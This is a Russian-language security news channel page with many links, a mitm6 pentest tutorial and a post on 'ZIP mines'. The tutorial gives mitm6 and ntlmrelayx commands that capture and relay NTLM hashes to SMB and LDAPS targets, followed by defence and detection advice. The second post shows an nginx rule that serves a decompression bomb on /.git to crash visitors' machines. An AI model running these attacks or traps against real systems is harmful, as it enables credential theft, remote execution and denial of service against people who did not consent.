Fsecurity | HH

🔗Ссылка: https://reliaquest.com/blog/threat-spotlight-ransomware-and-cyber-extortion-in-q3-2025

🔗Ссылка: https://habr.com/ru/articles/955134/

🔗Ссылка: https://github.com/s0md3v/roop

🔗Ссылка: https://habr.com/ru/companies/jetinfosystems/articles/933136/

🔗Ссылка: https://opennet.ru/64022/

🔗Ссылка: https://habr.com/ru/articles/954312/

🔗Ссылка: https://codeby.net/threads/osint-2025-perevorot-v-razvedke-kak-ai-i-avtomatizatsiya-menyayut-pravila-igry-fire.88590/

🔗Ссылка: https://habr.com/ru/articles/948508/

ОБЗОР УТИЛИТЫ MITM6: ФУНКЦИОНАЛ, АТАКИ И ЗАЩИТА RedBlue Notes на связи! Сегодня расскажу о утилите, которую стоит запускать при пентесте любой инфраструктуры с Active Directory

Пост имеет ознакомительный характер и предназначена для специалистов по безопасности. Автор и редакция не несут ответственности за любой вред, причиненный с применением изложенной информации. Распространение вредоносных программ, нарушение работы систем и нарушение тайны переписки преследуются по закону.

ФУНКЦИОНАЛ MITM6 mitm6 - это инструмент для проведения MITM атак в сетях IPv6. Он позволяет эксплуатировать особенности работы протокола NDP (Neighbor Discovery Protocol) для перехвата трафика и потенциального получения учетных данных. mitm6 становится шлюзом по умолчанию для всех IPv6-клиентов в локальной сети. Это достигается путем прослушивания DHCPv6-запросов и отправки поддельных ответов, указывающих атакующего как DNS по умолчанию. После этого весь IPv6-трафик жертв начинает направляться к атакующему 💻 АТАКИ С ИСПОЛЬЗОВАНИЕМ MITM6 🔓 1. Захват NTLM-хэшей После того как mitm6 стал DNS-сервером по умолчанию, он может отвечать на DNS-запросы поддельными записями, направляя трафик на контроллер атакующего. Если клиент попытается обратиться к несуществующему ресурсу (например, `wpad.domain.local`), mitm6 может предоставить адрес атакующего, который будет выдавать себя за WPAD-прокси. Это приведёт к автоматической отправке NTLM-аутентификации от клиента, которую можно перехватить Запускаем mitm6:

mitm6 -d domain.local

Запускаем ntlmrelayx для захвата хэшей:

ntlmrelayx.py -6 -wh attacker_ip -of hashes.txt

Ждём.... Теперь, когда клиенты начнут использовать атакующего как DNS-сервер, их попытки аутентификации будут перехватываться и ретранслироваться 😼 2. Ретрансляция NTLM-хэшей С помощью утилиты ntlmrelayx, которая часто используется совместно с mitm6, можно ретранслировать перехваченные NTLM-хэши на другие системы. Это позволяет выполнять атаки на повышение привилегий, например, создание новых пользователей или выполнение команд на удалённых системах 🕺

ntlmrelayx.py -6 -wh attacker_ip -t smb://target_ip -c "whoami"

3. Перехват LDAP-трафика Если клиенты используют IPv6 для связи с контроллерами домена, mitm6 может перенаправить этот трафик через себя, что даёт возможность перехватить LDAP-запросы и потенциально получить доступ к конфиденциальной информации 🤫

ntlmrelayx.py -6 -wh attacker_ip -t ldaps://target_dc_ip

ЗАЩИТА ОТ MITM6 🛡 1. Отключите IPv6 (если не используется) 2. Настройте защиту от поддельных DHCP-ответов и RA-сообщений от неавторизованных источников 3. Использование статических маршрутов и DNS. Это снизит вероятность того, что они примут поддельные настройки от mitm6 4. Мониторьте трафик. Регулярный анализ сетевого трафика на предмет аномалий, таких как неожиданные изменения маршрутов или DNS-запросы к подозрительным адресам, может помочь обнаружить использование mitm6 ДЕТЕКТ MITM6 👀 1. Ищите аномальные DHCPv6-ответы в логах, это может указать на использование mitm6. Обратите внимание на новые IPv6-адреса, назначенные вручную и необычные DNS по умолчанию 2. Ищите подозрительные RA-сообщения, аномальные DNS-запросы и ответы 3. Используйте IDS/IPS для отслеживания подозрительных действий, связанных с IPv6 и NDP Надеюсь, на этот канал подписаны Red и Blue тимеры из одной компании и они начнут играть в кошки-мышки с mitm6 после прочтения этого поста. Да начнутся Голодные игры, и пусть удача всегда будет с вами! 🥰 Подписывайтесь на канал, дальше больше!

🔗Ссылка: https://habr.com/ru/articles/954310/

🔗Ссылка: https://github.com/ZerkerEOD/krakenhashes

🔗Ссылка: https://deepstrike.io/blog/nextjs-security-testing-bug-bounty-guide

🔗Ссылка: https://habr.com/ru/news/953800/

🔗Ссылка: https://github.com/joaoviictorti/hypnus

Не редки случаи, когда хакеры натравливают на свои цели тяжёлую артиллерию – коммерческие (обычно крякнутые) сканеры, такие как, например, Acunetix. Всего через минуту, как хакер натравил на нас сканер уязвимостей, вся его оперативная память оказалась исчерпана, и вся ОС зависла на несколько минут. Разумеется, никаких результатов у такого сканирования не будет. Велика вероятность, что если хакер попадёт в наш «ZIP-капкан», он ощутит и более негативные последствия… В ОС Linux существует известная проблема механизма OOM Killer, при которой утечка памяти приводит к сильному замедлению системы вплоть до зависания ОС. И подвержены ей главным образом браузеры. Так что, если хакер попробует открыть наш сайт в браузере, то его ОС после утечки всей памяти и вовсе намертво зависнет, до полной перезагрузки системы. Повесив систему хакеру и, вероятно, вынудив его сделать жесткую перезагрузку, мы можем заставить его потерять какие-то несохранённые файлы. Как же можно применить это для защиты функционирующего сайта? Одним из простых решений может быть проксирование на ZIP-бомбу через nginx какой-нибудь не используемый каталог сайта, но такой, который точно будут искать хакеры. Отличными выбором могут быть каталоги .git или .svn. Они вряд ли нужны вашему веб-приложению, но для любого хакера must-have заглянуть туда.

server {
  ...
  location /.git {
    proxy_pass http://localhost:8080;
  }
}

Легитимные пользователи такие каталоги вряд ли станут искать, а тот, кто станет – будет проучен!

Давайте теперь посмотрим, как справятся с нами разнообразные хакерские разведывательные сканеры, ведь именно они наша главная цель. Как правило, обнаружив сайт, хакеры запускают инструменты, простукивающие его рабочий каталог на наличие потенциально интересных ресурсов. Например, хакер может сделать это популярным инструментом dirsearch. Обычно такие инструменты закидывают сайт десятками тысяч запросов, но тут на первом же запросе ещё на этапе калибровки dirsearch исчерпал всю память и аварийно завершился. И произошло это через каких-то 3-4 секунды. Другие аналоги: wfuzz, ffuf ведут себя аналогичным образом - падают наступив на ZIP-мину. Падение даже одного хакерского процесса с полным исчерпанием ресурсов ОС негативно сказывается и на общей производительности системы - тк память всех соседних процессов вытесняется на диск (swap), а сам дисковый кэш, обеспечивающий быстрый ввод-вывод, будет сброшен.

Сегодня веб формирует большую часть поверхности атак современного периметра. И есть один весьма болезненный приём против хакеров, ковыряющих чужой веб... Протокол HTTP для экономии трафика позволяет доставлять содержимое со сжатием. Но насколько сильного сжатия можно достичь, если использовать лишь одну единственную последовательность – например, всего один байт? Традиционно ZIP-бомбы являлись оружием хакеров, но PatientZero предложил интересную идею их использования в агрессивно защитных целях - ZIP-мины. Так всего один 1МБ данных, принятых по протоколу HTTP, может развернуться у хакера в 1ГБ в его оперативной памяти. 10МБ, соответственно, превратится уже в 10ГБ, что почти наверняка положит процесс на типовом арендованном сервере. Ну а 30МБ думаю хватит с головой и на средний десктоп. Сегодня открытие обычного сайта в браузере – это скачивания порядка 10МБ данных, что с нынешними скоростями происходит за пару секунд. Значит 10ГБ оперативной памяти мы заберем у атакующего быстрее, чем он успеет подумать. Такая встречная атака настолько проста в реализации, что провернуть её можно даже в терминале всего несколькими командами (скрин). Теперь открытие любой веб-страницы на таком листенере вызовет взрыв ZIP-бомбы в RAM, которая заберёт всю память в радиусе 10ГБ.

🗞 Paged Out #7. • В свободном доступе есть один интересный журнал по информационной безопасности и этичному хакингу. Единственный минус - журнал публикуется на английском языке, но его формат (1 страница = 1 статья) является весьма интересным, а перевести информацию на нужный язык не составит особого труда (особенно c chatgpt и deepl). • Так вот, на днях был опубликован 7-й выпуск. Журнал весьма ламповый и полностью бесплатный, а контент собирают авторы со всего света. К слову, вы можете направить свой материал для публикации, который пройдет модерацию и будет опубликован. Скачать все выпуски можно по ссылке: https://pagedout.institute. Приятного чтения =) S.E. ▪️ infosec.work ▪️ VT

🔗Ссылка: https://www.securitylab.ru/analytics/564242.php

🔗Ссылка: https://habr.com/ru/articles/951354/